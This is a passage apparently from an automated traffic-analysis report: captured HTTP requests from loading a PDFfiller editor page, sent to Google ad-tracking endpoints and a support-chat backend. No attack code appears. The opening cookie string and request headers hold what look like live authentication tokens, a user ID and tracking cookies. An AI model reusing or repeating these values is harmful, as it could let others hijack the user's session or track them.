ryfRJSykSonc22c2znS-Pc7onBlnQtpdBBg-KAaqqs4uE3UDEBiCwNxzckV3esbNPHmd6Y1FvLDEaYwSlOcnVmYF_7XOpt-TfAXueHM4q9nx8oB_I45bqbhpeoANMQJ0A2_eivElVemjxCIfzmPLUtXmbB7oIw5P37ypQVgktm0kaLlqB9_g8ArdhwmIcfSgPm9rIQMZU-MWbQ2_d4tZdWcY4; api_auth=%7B%22userId%22%3A2066364496%2C%22token%22%3A%22NLzmrDlMbT18Aq3MMvPUIcNAc%22%7D; user_uuid=0bb23cf2-694b-4f31-b787-ac9ea152909f; bm_mi=96840EE2428ED53FB73043122C1E5414~YAAQ6NYhF/w6SK2TAQAA0wGI3xrGx3PcJ38Ch7wY1UCEliEbxAM8t8B+nO8nlK1UUlsoZHJa/fPrHKKo6jfbmSk2GIY170g87bqKj3EZwfgqPaSUS/vITtdkyFdH3okCXvJcTXohWfto1YJhtxN1cce4DZJIbPMA4XSWbtxOj4+kdqc8WJQZUzUm+1Gc78wN8Z26V7uWNTBDApCGcKj4TBlMrFODc0+LmrPWV6Om3qI+GEFgb4+BY6ysbgMpoXt34KGDxVjKXCdedxAcMu/Mpjcckxe5WLjsijoNmq/7OP8zyl/NxSIe++495Zt6BC+7LxL1tqb8s4W54yeMb3R0fVkOspc=~1; api_js_sdk=2066364496%3ANLzmrDlMbT18Aq3MMvPUIcNAc; api_js=2066364496%3ANLzmrDlMbT18Aq3MMvPUIcNAc; ak_bmsc=D0ED3DB5E7280C727ED09669F69DF10F~000000000000000000000000000000~YAAQ6NYhFxM8SK2TAQAAMRWI3xoH8zlFZP1Y7zh1nC12CL/sDSXgi3wxGAvNFf5z82W9efuyEpYTyaM7r7rdn6ly8K6AakUl4s+0skw4AnKgF/R06TuVJWXiZ7ifJuc6hpiJ0ttnkoiBIZC4TkzV6YNXO0Sx7jx+P8Aoigl0bs1qn9ec/dRZuMkjzS0NjSq22hTnz2PsHiNYBIeGRfamaEGrFXuGIrJ8piQOXfBw7p6sc6wq/H2lwZD0+QBYLBDq5RZi1/EdeBOxnEPsH79K7/yi58sjAIYdTIjHsfmmIDPhqVUcFJMM65TIsK886Ld8+pHhiRhqjUJ9TmANrsPC6FemLEkmi79LSp0gUMXv+wq0w5syZBYRhTQFxDJoxI/dzS3O
            Source: global trafficHTTP traffic detected: GET /td/rul/972636148?random=1734622061570&cv=11&fst=1734622061570&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4cc1v890312743z878355092za201zb78355092&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&u_w=1920&u_h=1080&url=https%3A%2F%2Fwww.pdffiller.com%2Fjsfiller-desk19%2F%3Fflat_pdf_quality%3Dhigh%26isShareViaLink%3D1%26requestHash%3Da2c5609ba93c5a066fe0a36d5e28c4f30219bce773a7ef5f77123304be4f67c2%26lang%3Den%26projectId%3D1720458241%26PAGE_REARRANGE_V2_MVP%3Dtrue%26richTextFormatting%3Dtrue%26isPageRearrangeV2MVP%3Dtrue%26jsf-page-rearrange-v2%3Dtrue%26jsf-redesign-full%3Dtrue%26act-notary-pro-integration%3Dtrue%26isSkipEditorLoadFrequency%3Dtrue%26jsf-desktop-ux-for-tablets%3Dfalse%26jsf-probability-70%3Dtrue%26jsf-socket-io%3Dfalse%26jsf-simplified-modes-iteration-1%3Dfalse%26jsf-offline-mode%3Df&label=5lebCLn80awBEPT_5M8D&hn=www.googleadservices.com&frm=0&tiba=PDFfiller%20-%20Project%20Proposal%20Document%20Q50336.pdf&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=31251489.1734622060&uaa=x86&uab=64&uafvl=Chromium%3B128.0.6613.120%7CNot%253BA%253DBrand%3B24.0.0.0%7CGoogle%2520Chrome%3B128.0.6613.120&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&ct_cookie_present=0 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.pdffiller.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /api/pdffiller/chat/get-src HTTP/1.1Host: support-backend.usrsprt.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.pdffiller.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.pdffiller.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/972636148/?random=1009888212&cv=11&fst=1734622061570&bg=ffffff&guid=ON&async=1&gtm=45be4cc1v890312743z878355092za201zb78355092&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&u_w=1920&u_h=1080&url=https%3A%2F%2Fwww.pdffiller.com%2Fjsfiller-desk19%2F%3Fflat_pdf_quality%3Dhigh%26isShareViaLink%3D1%26requestHash%3Da2c5609ba93c5a066fe0a36d5e28c4f30219bce773a7ef5f77123304be4f67c2%26lang%3Den%26projectId%3D1720458241%26PAGE_REARRANGE_V2_MVP%3Dtrue%26richTextFormatting%3Dtrue%26isPageRearrangeV2MVP%3Dtrue%26jsf-page-rearrange-v2%3Dtrue%26jsf-redesign-full%3Dtrue%26act-notary-pro-integration%3Dtrue%26isSkipEditorLoadFrequency%3Dtrue%26jsf-desktop-ux-for-tablets%3Dfalse%26jsf-probability-70%3Dtrue%26jsf-socket-io%3Dfalse%26jsf-simplified-modes-iteration-1%3Dfalse%26jsf-offline-mode%3Df&label=5lebCLn80awBEPT_5M8D&hn=www.googleadservices.com&frm=0&tiba=PDFfiller%20-%20Project%20Proposal%20Document%20Q50336.pdf&value=0&npa=0&pscdl=noapi&auid=31251489.1734622060&uaa=x86&uab=64&uafvl=Chromium%3B128.0.6613.120%7CNot%253BA%253DBrand%3B24.0.0.0%7CGoogle%2520Chrome%3B128.0.6613.120&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&fmt=3&ct_cookie_present=false&crd=CLHBsQIIsMGxAgixw7ECCIrFsQIIwsmxAgjrxrECCKPFsQII08WxAiIBATgBQAFKFWV2ZW50LXNvdXJjZSwgdHJpZ2dlcloDCgEBYgQKAgID&eitems=ChAIgKWPuwYQ_Ivq-YrJqPJ0Eh0ATXZP9E0QB1KBclfYBFsiuhy6xxK7JLrdq6daFw&pscrd=CLCB49GbiqmJ0AEiEwiTyrbfkrSKAxVL--MHHcx5BaMyAggDMgIIBDICCAcyAggIMgIICTICCAoyAggCMgIICzICCBUyAggfMgIIEzICCBI6Gmh0dHBzOi8vd3d3LnBkZmZpbGxlci5jb20vQldDaEVJZ0tXUHV3WVFqWml1cnYzRnRhdjlBUklzQU1IMTFlTVNhUUV6UFYtd203TnllbjlZZXZXMjNVOW41RFdqZVVfdUhQX1lrSWR1RnJqOURxYllQelE HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.pdffiller.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
            Source: global trafficHTTP traffic detected: GET /api/pdffiller/chat/get-src HTTP/1.1Host: support-backend.usrsprt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /pagead/1p-conversion/972636148/?random=1009888212&cv=11&fst=1734622061570&bg=ffffff&guid=ON&async=1&gtm=45be4cc1v890312743z878355092za201zb78355092&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&u_w=1920&u_h=1080&url=https%3A%2F%2Fwww.pdffiller.com%2Fjsfiller-desk19%2F%3Fflat_pdf_quality%3Dhigh%26isShareViaLink%3D1%26requestHash%3Da2c5609ba93c5a066fe0a36d5e28c4f30219bce773a7ef5f77123304be4f67c2%26lang%3Den%26projectId%3D1720458241%26PAGE_REARRANGE_V2_MVP%3Dtrue%26richTextFormatting%3Dtrue%26isPageRearrangeV2MVP%3Dtrue%26jsf-page-rearrange-v2%3Dtrue%26jsf-redesign-full%3Dtrue%26act-notary-pro-integration%3Dtrue%26isSkipEditorLoadFrequency%3Dtrue%26jsf-desktop-ux-for-tablets%3Dfalse%26jsf-probability-70%3Dtrue%26jsf-socket-io%3Dfalse%26jsf-simplified-modes-iteration-1%3Dfalse%26jsf-offline-mode%3Df&label=5lebCLn80awBEPT_5M8D&hn=www.googleadservices.com&frm=0&tiba=PDFfiller%20-%20Project%20Proposal%20Document%20Q50336.pdf&value=0&npa=0&pscdl=noapi&auid=31251489.1734622060&uaa=x86&uab=64&uafvl=Chromium%3B128.0.6613.120%7CNot%253BA%253DBrand%3B24.0.0.0%7CGoogle%2520Chrome%3B128.0.6613.120&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&fmt=3&ct_cookie_present=false&crd=CLHBsQIIsMGxAgixw7ECCIrFsQIIwsmxAgjrxrECCKPFsQII08WxAiIBATgBQAFKFWV2ZW50LXNvdXJjZSwgdHJpZ2dlcloDCgEBYgQKAgID&pscrd=CLCB49GbiqmJ0AEiEwiTyrbfkrSKAxVL--MHHcx5BaMyAggDMgIIBDICCAcyAggIMgIICTICCAoyAggCMgIICzICCBUyAggfMgIIEzICCBI6Gmh0dHBzOi8vd3d3LnBkZmZpbGxlci5jb20vQldDaEVJZ0tXUHV3WVFqWml1cnYzRnRhdjlBUklzQU1IMTFlTVNhUUV6UFYtd203TnllbjlZZXZXMjNVOW41RFdqZVVfdUhQX1lrSWR1RnJqOURxYllQelE&is_vtc=1&cid=CAQSKQCa7L7dpLWHdczz41BANI18a3Re-v1S6POSFkbM4sB9zXKZmMLsEnrq&eitems=ChAIgKWPuwYQ_Ivq-YrJqPJ0Eh0ATXZP9H8rJJI2_YY13Pik31GZ_kmr9W3aAkrhfA&random=1941903674 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.pdffiller.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
            Source: global trafficHTTP traffic detected: GET /pagead/1p-conversion/972636148/?random=1009888212&cv=11&fst=1734622061570&bg=ffffff&guid=ON&async=1&gtm=45be4cc1v890312743z878355092za201zb78355092&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&u_w=1920&u_h=1080&url=https%3A%2F%2Fwww.pdffiller.com%2Fjsfiller-desk19%2F%3Fflat_pdf_quality%3Dhigh%26isShareViaLink%3D1%26requestHash%3Da2c5609ba93c5a066fe